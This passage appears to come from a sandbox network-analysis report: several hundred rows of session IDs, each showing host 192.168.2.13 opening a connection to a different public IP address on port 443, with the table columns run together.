                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21113192.168.2.134978825.238.171.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21114192.168.2.1353510212.215.154.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21115192.168.2.135371854.54.131.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21116192.168.2.136038277.108.224.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21117192.168.2.135531049.51.210.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21118192.168.2.1337798152.38.86.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21119192.168.2.134585489.145.220.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21120192.168.2.1335418158.189.213.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21121192.168.2.133809047.129.231.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21122192.168.2.135113094.95.133.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21123192.168.2.1336276176.242.117.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21124192.168.2.1332872211.95.167.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21125192.168.2.1342002144.172.32.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21126192.168.2.1338542101.155.130.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21127192.168.2.1344034196.91.235.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21128192.168.2.1353568175.10.215.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21129192.168.2.1360408177.41.246.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21130192.168.2.1353652137.189.102.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21131192.168.2.1360022114.104.135.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21132192.168.2.1333710125.235.31.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21133192.168.2.1360390207.167.41.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21134192.168.2.1343928218.219.54.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21135192.168.2.1353454133.227.2.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21136192.168.2.134095247.138.246.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21137192.168.2.1348492204.195.152.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21138192.168.2.1336378198.210.234.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21139192.168.2.1343084149.9.108.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21140192.168.2.134332096.35.172.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21141192.168.2.135318237.122.150.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21142192.168.2.1343066121.86.239.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21143192.168.2.1336158220.43.25.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21144192.168.2.134621488.234.216.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21145192.168.2.1344918168.173.28.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21146192.168.2.135676054.219.120.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21147192.168.2.1352088204.100.125.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21148192.168.2.135210062.236.63.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21149192.168.2.13465569.39.232.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21150192.168.2.1337540143.187.137.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21151192.168.2.1351354207.205.176.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21152192.168.2.1357262135.27.230.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21153192.168.2.1350442149.133.177.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21154192.168.2.1348980153.2.53.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21155192.168.2.1334548109.245.203.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21156192.168.2.135883662.36.215.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21157192.168.2.1335008110.151.234.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21158192.168.2.1341696151.214.167.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21159192.168.2.1344382192.136.182.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21160192.168.2.1341576168.110.91.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21161192.168.2.1340440108.154.77.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21162192.168.2.134286041.157.225.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21163192.168.2.133422275.98.231.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21164192.168.2.133596496.193.241.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21165192.168.2.134033263.43.80.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21166192.168.2.1342122196.182.199.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21167192.168.2.134508853.170.58.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21168192.168.2.1359372174.15.237.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21169192.168.2.1352612166.179.191.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21170192.168.2.1356244145.20.128.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21171192.168.2.1356356184.180.12.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21172192.168.2.135523251.133.119.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21173192.168.2.1353020190.195.3.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21174192.168.2.133710212.212.170.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21175192.168.2.1347344164.207.217.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21176192.168.2.1351266154.23.112.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21177192.168.2.1338682160.180.224.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21178192.168.2.1355624137.167.241.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21179192.168.2.1356754197.38.74.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21180192.168.2.1352936212.242.107.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21181192.168.2.1351828218.174.194.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21182192.168.2.1348594211.42.249.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21183192.168.2.1340744175.5.34.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21184192.168.2.135923631.7.87.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21185192.168.2.1360954157.141.207.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21186192.168.2.1357016106.224.53.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21187192.168.2.135135635.45.156.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21188192.168.2.135525667.151.162.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21189192.168.2.1333184177.36.16.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21190192.168.2.133859819.111.142.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21191192.168.2.1337074180.214.3.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21192192.168.2.1348594146.70.111.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21193192.168.2.1352736183.62.31.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21194192.168.2.134977295.44.209.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21195192.168.2.1360914165.138.192.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21196192.168.2.135105258.7.19.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21197192.168.2.1340852170.147.51.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21198192.168.2.1358060117.172.214.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21199192.168.2.135065853.75.251.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21200192.168.2.134688887.249.59.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21201192.168.2.135436637.4.92.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21202192.168.2.133637091.248.136.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21203192.168.2.1335880181.109.72.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21204192.168.2.1343124199.157.165.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21205192.168.2.1349392115.133.83.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21206192.168.2.1356752111.209.172.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21207192.168.2.1355066173.83.89.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21208192.168.2.1347396150.19.209.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21209192.168.2.135818685.233.16.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21210192.168.2.1349220140.224.4.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21211192.168.2.1339450190.79.83.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21212192.168.2.134526076.241.102.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21213192.168.2.1344640201.159.141.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21214192.168.2.1353776131.34.226.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21215192.168.2.135751461.133.39.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21216192.168.2.1332920211.223.32.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21217192.168.2.1353824132.143.167.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21218192.168.2.1340640178.91.135.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21219192.168.2.1356600134.200.27.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21220192.168.2.1352396122.143.180.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21221192.168.2.1334008121.55.168.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21222192.168.2.134546257.212.71.1443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21223192.168.2.1344892142.97.17.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21224192.168.2.134365043.211.122.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21225192.168.2.133953813.178.162.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21226192.168.2.1359894111.223.242.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21227192.168.2.1351506104.9.152.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21228192.168.2.133279484.232.202.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21229192.168.2.133775444.16.65.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21230192.168.2.134107084.34.121.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21231192.168.2.1355902146.99.41.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21232192.168.2.1337556117.7.230.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21233192.168.2.1357420130.156.23.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21234192.168.2.1339916161.23.201.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21235192.168.2.1343790110.78.169.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21236192.168.2.1354146184.148.76.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21237192.168.2.1343378180.8.45.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21238192.168.2.1342070185.122.168.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21239192.168.2.1348874105.184.152.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21240192.168.2.1334198100.237.68.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21241192.168.2.1348280219.192.103.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21242192.168.2.1360610101.68.195.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21243192.168.2.133532242.31.158.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21244192.168.2.1346542118.1.181.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21245192.168.2.133865684.117.234.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21246192.168.2.134365813.47.45.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21247192.168.2.1338036217.84.88.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21248192.168.2.134412874.182.237.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21249192.168.2.1335592221.253.32.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21250192.168.2.1356022158.165.169.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21251192.168.2.134437412.239.177.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21252192.168.2.1360282151.23.68.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21253192.168.2.1352840150.55.134.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21254192.168.2.133641885.225.195.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21255192.168.2.133758096.90.37.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21256192.168.2.1358948219.211.94.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21257192.168.2.1346818196.139.76.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21258192.168.2.1341528201.245.36.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21259192.168.2.13472741.33.207.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21260192.168.2.133586038.170.220.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21261192.168.2.135736449.160.38.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21262192.168.2.134308481.204.68.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21263192.168.2.1338776107.114.97.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21264192.168.2.1353170138.85.84.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21265192.168.2.1340886179.198.190.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21266192.168.2.1353478220.214.138.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21267192.168.2.135726413.177.114.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21268192.168.2.13348022.181.100.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21269192.168.2.1358836110.41.123.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21270192.168.2.1354620169.236.79.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21271192.168.2.133819265.145.45.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21272192.168.2.134387280.148.46.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21273192.168.2.1338996194.116.208.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21274192.168.2.133309276.162.38.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21275192.168.2.1344034157.30.162.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21276192.168.2.135532076.156.218.146443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21277192.168.2.1360436189.143.160.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21278192.168.2.1348468174.17.21.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21279192.168.2.1333104212.215.225.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21280192.168.2.1335642156.49.205.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21281192.168.2.135713288.43.212.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21282192.168.2.13397201.108.253.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21283192.168.2.134283489.192.33.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21284192.168.2.135329032.67.149.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21285192.168.2.134338814.185.94.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21286192.168.2.134434842.250.239.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21287192.168.2.134853018.28.115.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21288192.168.2.133800896.129.210.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21289192.168.2.135338251.49.163.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21290192.168.2.1360616136.33.90.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21291192.168.2.1335888115.251.87.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21292192.168.2.1347336206.132.39.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21293192.168.2.1338268174.241.162.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21294192.168.2.1358258200.208.140.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21295192.168.2.1333678136.36.119.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21296192.168.2.1349796177.36.4.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21297192.168.2.133371045.24.235.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21298192.168.2.1345526121.37.190.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21299192.168.2.135396832.62.217.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21300192.168.2.135851859.229.77.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21301192.168.2.1349720111.160.109.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21302192.168.2.1333274187.3.163.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21303192.168.2.136027490.144.214.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21304192.168.2.135627413.93.155.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21305192.168.2.1336846117.111.129.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21306192.168.2.1343768115.104.16.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21307192.168.2.135337814.201.155.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21308192.168.2.1345884107.68.151.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21309192.168.2.1358078201.31.138.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21310192.168.2.134048877.117.217.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21311192.168.2.1337296120.170.22.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21312192.168.2.134750238.119.74.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21313192.168.2.1339080122.86.91.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21314192.168.2.1354846148.164.206.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21315192.168.2.135790853.189.70.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21316192.168.2.1333582149.153.121.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21317192.168.2.134838681.189.56.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21318192.168.2.134328674.28.84.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21319192.168.2.1340654134.245.209.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21320192.168.2.1348822105.173.193.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21321192.168.2.1346474136.182.95.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21322192.168.2.1356592115.179.73.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21323192.168.2.134594264.126.88.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21324192.168.2.135787842.163.181.5443
                                                  TimestampBytes transferredDirectionData


